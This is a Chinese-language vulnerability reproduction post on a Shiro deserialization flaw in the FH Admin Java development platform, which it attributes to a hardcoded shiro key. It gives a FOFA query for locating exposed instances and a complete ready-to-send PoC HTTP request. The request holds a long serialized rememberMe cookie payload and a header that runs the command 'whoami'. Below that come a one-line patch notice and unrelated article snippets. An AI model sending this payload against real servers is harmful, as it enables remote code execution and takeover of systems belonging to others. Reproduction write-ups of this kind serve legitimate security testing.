FH Admin Shiro反序列化漏洞复现

0x01 产品简介

  FH Admin 是一款 java 快速开发平台。

0x02 漏洞概述

 FH Admin CMS 存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:app="FH-Admin"

0x04 漏洞复现 

PoC

GET /appSysUser/registerSysUser.do HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Token-Data: whoami
Cookie: rememberMe=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
Accept-Encoding: gzip
Connection: close

0x05 修复建议 

⼚商已发布了漏洞修复程序,请及时关注更新:http://www.fhadmin.org/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/209451.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

HT71778 实时音频信号跟踪同步升压转换器的特性

HT71778是一款高功率、全集成升压转换器,集成16mΩ功率开关管和18mΩ同步整流管,为便携式系统提供G效的小尺寸处理方案。 HT71778 实时音频信号跟踪同步升压转换器的特性: ・实时音频信号跟踪的电源供电 SN 短接地, VIN 2.7~4.5V, VOUT 5…

Leetcode—2661.找出叠涂元素【中等】

2023每日刷题(四十六) Leetcode—2661.找出叠涂元素 题意解读 题目意思就是,按照arr数组从左到右的顺序遍历各个arr[i],涂抹这个值在矩阵中对应位置的网格,一旦你发现它所在的行或者列满员了,就返回这个i…

自定义Vue的DockPanel-Layout

创作来源 1、在vue项目中需要有停靠、浮动、面板布局等需求,如arcgis的界面布局 2、在npm中搜索了关于vue的docklayout组件,搜索后就一个组件imengyu/vue-dock-layout,截图如下,该组件没有停靠组件,没有浮动组件&…

Linux学习——模拟实现mybash小程序

目录 一,跟正宗的bash见个面 二,实现一个山寨的bash 1.提示符 2.输入命令与回显命令 3.解析命令 4.执行命令 5.执行逻辑 三,全部代码 一,跟正宗的bash见个面 在这篇文章中,我会写一个myshell小程序。这个小程序…

Linux中top命令输出日志分析?

以下是对输出的各部分的解释: 09:54:34:系统当前时间。up 161 days, 2:08:系统已经运行了161天2小时8分钟。5 users:有5个用户登录系统。load average: 0.13, 0.08, 0.05:系统的1分钟、5分钟、15分钟的平均负载。负载…

数据结构与算法之美学习笔记:29 | 堆的应用:如何快速获取到Top 10最热门的搜索关键词?

目录 前言堆的应用一:优先级队列堆的应用二:利用堆求 Top K堆的应用三:利用堆求中位数解答开篇内容小结 前言 本节课程思维导图: 搜索引擎的热门搜索排行榜功能你用过吗?搜索引擎每天会接收大量的用户搜索请求&#x…

Opencv制作电子签名(涉及知识点:像素过滤,图片通用resize函数,像素大于某个阈值则赋值为其它的像素值)

import cv2def resize_by_ratio(image, widthNone, heightNone, intercv2.INTER_AREA):img_new_size None(h, w) image.shape[:2] # 获得高度和宽度if width is None and height is None: # 如果输入的宽度和高度都为空return image # 直接返回原图if width is None:h_ratio …

手机上的记事本怎么打开?安卓手机通用的记事本APP

有不少上班族发现,自己想要在电脑上随手记录一些工作文字内容,直接使用电脑上的记事本工具来编辑文字是比较便捷的。但是如果想要在手机上记录文字内容,就找不到手机上的记事本了。那么手机上的记事本怎么打开?安卓手机通用的记事…

MySQL:找回root密码

一、情景描述 我们在日常学习中,经常会忘记自己的虚拟机中MySQL的root密码。 这个时候,我们要想办法重置root密码,从而,解决root登陆问题。 二、解决办法 1、修改my.cnf配置文件并重启MySQL 通过修改配置文件,来跳…

Symbol()和迭代器生成器

目录 1、Symbol() 2、迭代器生成器 执行流程 模拟生成器函数 for of 遍历迭代选择器 yield * Generator函数应用 1、Symbol() Symbol表示独一无二的值 const s1 Symbol(a)const s2 Symbol(a)console.log(s1 s2) // fa…

Elasticsearch 如何处理 Aggs 顺序中的大写字母和小写字母?

Elasticsearch 排序允许你根据特定条件对搜索结果进行排序。 然而,在排序时处理区分大小写时,Elasticsearch 将大写和小写字母视为不同的字符,分别对它们进行排序。 这是因为 ASCII 表顺序是从大写 A 到小写 z。 默认情况下,Elas…

MySQL之性能分析和系统调优

MySQL之性能分析和系统调优 性能分析 查看执行计划 EXPLAIN EXPLAIN作为MySQL的性能分析神器,可以用来分析SQL执行计划,需要理解分析结果可以帮助我们优化SQL explain select … from … [where ...]TABLE 表名 查询的每一行记录都对于着一张表 id 该…

【数据结构】最短路径(Dijskra算法)

一.引例 计算机网络传输的问题: 怎样找到一种最经济的方式,从一台计算机向网上所有其他计算机发送一条消息。 抽象为: 给定带权有向图G(V,E)和源点v,求从v到G中其余各顶点的最短路径。 即&…

优化问题,详解静态优化

优化问题,尤其静态优化问题,在控制系统设计中随处可见,例如基于燃油经济性和驾驶体验的多目标优化的汽车发动机 MAP 标定,基于性能指标优化的飞行器结构设计参数优化,以实验数据与模型输出匹配为目标的电池 RC 等效电路…

[WP] ISCTF2023 Web 部分题解

圣杯战争!!! 反序列化伪协议读取 where_is_the_flag 环境变量根目录当前目录 绕进你的心里 利用正则最大回溯绕过 easy_website or select 用双写绕过 空格用/**/绕,报错注入 wafr codesystem(ca\t /f*) webinclude 扫描得到index.bak备份文件打开为加密的代码 写…

Linux Spug自动化运维平台本地部署与公网远程访问

文章目录 前言1. Docker安装Spug2 . 本地访问测试3. Linux 安装cpolar4. 配置Spug公网访问地址5. 公网远程访问Spug管理界面6. 固定Spug公网地址 前言 Spug 面向中小型企业设计的轻量级无 Agent 的自动化运维平台,整合了主机管理、主机批量执行、主机在线终端、文件…

SAP_ABAP_编程基础_数据集_创建并填充摘录数据集 / 处理摘录数据集

SAP ABAP 顾问(开发工程师)能力模型_Terry谈企业数字化的博客-CSDN博客文章浏览阅读494次。目标:基于对SAP abap 顾问能力模型的梳理,给一年左右经验的abaper 快速成长为三年经验提供超级燃料!https://blog.csdn.net/j…

【U8+】用友U8修改凭证提示:外部凭证在总账系统中不能修改。

【问题描述】 用友U8中,在总账模块中修改凭证的时候,提示: 外部凭证在总账系统中不能修改。 【原因分析】 在软件中,使用其他模块的情况下, 其他模块生成的凭证都会传到总账模块中,进而这些由其他模块生成…

uniapp设置手机通知权限以及uniapp-push2.0推送

unipush2.0代码 export default function () {// 调用获取用户通知权限setPermissions()// 获取客户端唯一的推送标识,可用于测试uni.getPushClientId({success: (res) > {console.log(res.cid)},fail(err) {console.log(err)}})// 监听推送uni.onPushMessage(r…

windows ssh时出现Bad local forwarding specification的解决方案

大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的…